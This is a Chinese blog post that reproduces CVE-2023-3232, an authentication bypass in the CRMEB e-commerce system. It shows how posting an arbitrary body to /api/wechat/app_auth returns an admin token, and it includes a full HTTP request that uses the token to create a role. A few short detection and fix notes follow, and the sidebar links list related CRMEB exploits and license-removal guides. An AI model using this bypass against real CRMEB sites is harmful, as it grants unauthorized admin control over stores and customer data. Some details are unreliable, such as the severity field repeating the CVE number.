CRMEB apiwechatapp_auth 权限绕过漏洞(CVE-2023-3232)

已于 2023-10-24 16:47:08 修改
阅读量1.7k 收藏
点赞数
文章标签: 漏洞复现 app
于 2023-09-21 16:38:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68999845/article/details/133137975
版权

CRMEB api wechat app_auth 权限绕过漏洞(CVE-2023-3232)

*一、漏洞概述 **

*1.1 漏洞简介*

·漏洞名称:CRMEB apiwechatapp_auth 权限绕过漏洞

·漏洞编号:CVE-2023-3232

·漏洞类型:权限绕过漏洞

·漏洞威胁等级:CVE-2023-3232

·影响范围:Zhongbang CRMEB 4.6.0之前版本

·利用条件:默认配置

*1.2 组件描述*

Zhongbang CRMEB是中国西安众邦网络(Zhongbang)公司的一套开源的电商管理系统。

*1.3 漏洞描述*

Zhongbang CRMEB 4.6.0之前版本存在代码问题漏洞。攻击者利用该漏洞导致数据反序列化。

*二、漏洞复现*

*2.1 应用协议*

http

*2.2 环境搭建*

1.下载源码到本地,用phpstudy运行即可:https://github.com/crmeb/CRMEB

请添加图片描述

*2.3 漏洞复现 **

POST请求url:http://ip/api/wechat/app_auth

,POST_body=“1=1”(post_body的值在下文流量分析中提及,此处以1=1为例),获取token值

请添加图片描述

2.使用token随意请求功能点(以添加身份为例),执行成功

POST /adminapi/setting/role/0 HTTP/1.1
Host: 10.65.15.39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJlZTVjYzNlOTA3OGUxYWQyMTg3MmJjODRhMDIwNTEzYSIsImlzcyI6IjEwLjY1LjE1LjM5IiwiYXVkIjoiMTAuNjUuMTUuMzkiLCJpYXQiOjE2OTQ1ODc0MjIsIm5iZiI6MTY5NDU4NzQyMiwiZXhwIjoxNjk3MTc5NDIyLCJqdGkiOnsiaWQiOjEsInR5cGUiOiJhZG1pbiJ9fQ.eDMdeaHSfXZoagbUsrk03i3TfSlL26W14KQe9wxWRGo
Content-Length: 376
Origin: http://10.65.15.39
Connection: close
Referer: http://10.65.15.39/admin/setting/system_role/index


{"role_name":"test","status":0,"checked_menus":[7,369,368,367,366,9,10,828,585,628,621,895,759,756,758,757,671,625,888,887,627,626,622,624,623,613,615,614,244,246,245,241,243,242,238,240,239,236,235,234,233,232,227,263,265,264,262,261,589,894,780,788,785,787,786,782,784,783,781,774,592,594,593,591,590,11,586,253,260,257,259,258,256,255,254,252,251,247,249,248,250],"id":0}

请添加图片描述在这里插入图片描述

*三、漏洞分析*

*3.1 流量分析 **

POST请求/api/wechat/app_auth,body部分经过测试可以为任意字符串,且必须有“=”的同时不能有“&“,例如:!@#$%^qweqweq=wrqwf12312=,相应体为200,且msg后跟随”登陆成功“,wireshark无法获取中文

*3.2 绕过方式*

通过/api/wechat/app_auth,输入body即可得到token

*四、漏洞检测*

*4.1 组件版本自检*

以下版本受该漏洞影响:4.6.0以下

目前最高版本:4.7.0

*4.4 研判建议 **

测试url/api/wechat/app_auth,增加body部分观察是否回显token

*五、防范建议*

*5.1 官方修复建议*

未修复

*5.2 临时修复建议*

/api/wechat/app_auth处进行严格限制

六、*参考链接*

源码下载url:https://github.com/crmeb/CRMEB

Tkite
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
crmeb全部代码,请勿商用
07-07
crmeb全部代码,所有代码均在里面,请勿商用,里面有自己的一些见解修改可以参考,大家有意见可以评论一起研讨
CRMEB去除版权信息教程
不二青春
05-17 6012
本文是crmeb简单二开教程 源码地址:直通车》》》 前台个人中心版权去除 前端源码:view/uni-app 替换此文件下的/static/images/support.png为自己的logo 然后重新打包 公众号、h5重新打包教程:https://help.crmeb.net/crmeb-v4/1863440 小程序重新打包教程:https://help.crmeb.net/crmeb-v4/1863444 后台页面底部版权去除 找到源码:view/admin 全局搜索西安...
c#mvc上传文件保存到后台_【安全漏洞通告】CRMEB知识付费系统后台存在文件上传漏洞...
weixin_39844880的博客
12-25 459
安全漏洞通告INFORMATIONCRMEB知识付费系统后台存在文件上传漏洞01漏洞背景西安众邦网络科技有限公司以网站建设、微信公众号、微信商城以及O2O商城为核心业务,专注于创意设计和传播应用。CRMEB知识付费系统由西安众邦科技基于ThinkPhp5.0+vue+layui开发,具有自主知识产权。该系统后台用form-builder PHP快速生成现代化表单应用、ECharts实现完...
众邦科技CRMEB商城商业版任意文件写入getshell 0day
qq_63217130的博客
03-25 474
可以看到也没有任何过滤导致可以向任意路径的文件写入任意内容 前提是知道密码config('filesystem.password') 由于没有限制密码输入 次数导致可以爆破。写入文件的接口 /adminapi/system/crud/save_file/:id 处理的代码如下。没有对传入参数的路径做任何过滤以及后缀的检查,导致可以在任意路径创建任意后缀的文件,因此可以再网站。但是内容会有默认的代码 再配合以下接口进行内容 修改(任意内容写入)两个接口配合即可写入任意代码导致。
CRMEB知识付费v2.0版系统源码-已去授权
07-12
新增讲师入驻独立后台管理去除授权包下载完整包下载 知识付费v2.0版本 已去授权 更新主题 完善讲师功能,从讲师入驻到讲师后台,形成一个业务闭环; 一、更新说明 前端 1.移动端增加讲师申请页,已是讲师的用户不显示申请按钮 2.增加移动端讲师管理,讲师可查看自己名下的专题课程、资料、活动、商品 3.讲师可在移动端查看收益及收益明细; 4.直播分成:前后台可以统计直播收益,后台设置收益分成,讲师可以在讲师管理中提现收益 5.资料、商品、活动详情中显示所属讲师信息 6.讲师详情中展示名下专题课程、资料、活动、商品 本产品已去除授权 仅供学习使用,如需商用请到官网购买授权
crm源码破解版
11-18
易客crm破解版,调试没有任何问题,可以直接运行,不用自动的环境
漏洞分析|CRMEB 开源商城 sid 参数 SQL 注入漏洞
xuandaoren的博客
10-12 1242
是使用extractvalue()函数从数据库中提取数据,并检查提取的数据,当与MD5进行哈希时,是否与特定的哈希值匹配。CRMEB打通版v4是免费开源商城系统,UINAPP+thinkphp6框架商城.CRMEB打通版/api/products路径下的sid参数存在未经过滤的SQL语句拼接导致SQL注入。攻击者除了可以利⽤ SQL 注⼊漏洞获取数据库中的信息(例如,管理员后台密码、站点的⽤户个⼈信息)之外,甚⾄在⾼权限的情况可向服务器中写⼊⽊⻢,进⼀步获取服务器系统权限。披露日期:2023/10/9。
CRMEB多端多语言系统文件上传0Day代审历程
weixin_43526443的博客
09-05 2059
这两天攻防中,某政局子公司官网后台采用的CRMEB开源商城CMS,挺奇葩,别问怎么总让我碰到这种东西,我也不知道,主打的就是一个魔幻、抽象。最后通过审代码,绕过历史漏洞修复的补丁(文章内容可能有点少,没办法,这个代审快到了我只用了5秒)
CRMEB 单商户PRO多商户通用去版权教程
qq_33893226的博客
04-15 5824
CRMEB去版权教程,此教程可根据具体版本进行调整,基本适用次方法。 1、后端版权修改 修改后端管理底部版权及门店后端管理底部版权。 文件位置 \view\admin\src\components\copyright\index.vue 文件位置 \view\admin\src\router\routes.js 文件位置 \view\store\src\components\copyright\index.vue 文件位置 \view\store\src\router\routes.js
利用一段代码绕过PHP授权代码
小小小小小白熊博客
03-30 282
创建一个文件,和改名前的全局文件名称一样,然后把以下代码复制进去就OK了。比如说全局文件 common.php,那么 你将他改为core.php。今天给大家带来一个绕过授权的教程,请仔细看哦!很多的网站源码需要授权 是不是很烦恼?第一步:首先你需要改名全局文件。
crmeb docker环境搭建以及bug记录
weixin_41108896的博客
07-19 1066
环境搭建 全部文件 百度云链接:https://pan.baidu.com/s/1daLbCxQ-6Os2OJwQo7V1Ug 提取码:wsac 解压gz文件得到tar文件 gzip -d gz文件 2 docker load tar文件 3 docker images 看一下镜像名称 4 docker run -itd --name tt -p 8888:80 -v ...
Python库 | django_okta_auth-0.5.1-py3-none-any.whl
05-30
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:django_okta_auth-0.5.1-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
pam_ssh_agent_auth-0.10.3-7.12.el8.x86_64.rpm
01-22
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
Python库 | drf_advanced_auth-0.2.1-py3-none-any.whl
05-31
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:drf_advanced_auth-0.2.1-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | django_ninja_auth-0.1.5-py3-none-any.whl
03-29
资源分类:Python库 所属语言:Python 资源全名:django_ninja_auth-0.1.5-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
spring-android-basic-auth.zip_android_spring_spring auth_spring-
09-20
spring-android-basic-auth
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
configurationFile配置文件解密
AX3_OTP_Auth-1.0.4-py3-none-any.whl.zip
最新发布
04-15
AX3_OTP_Auth-1.0.4-py3-none-any.whl.zip
AX3_OTP_Auth-1.0.3-py3-none-any.whl.zip
04-15
AX3_OTP_Auth-1.0.3-py3-none-any.whl.zip
OpenSSH 安全漏洞(CVE-2021-41617)
07-29
CVE-2021-41617 是 OpenSSH 的一个安全漏洞,也被称为 "pre-auth username enumeration" 漏洞。该漏洞影响 OpenSSH 7.3 到 8.4 版本之间的版本。它允许攻击者通过暴力猜测的方式,通过 SSH 服务器的响应时间来确定有效用户名。这可能导致攻击者进行有效用户的枚举,从而增加进一步的攻击风险。 OpenSSH 团队已经发布了修复该漏洞的补丁,建议用户升级到受影响版本之外的最新版本。确保及时更新 OpenSSH 软件以保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tkite

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值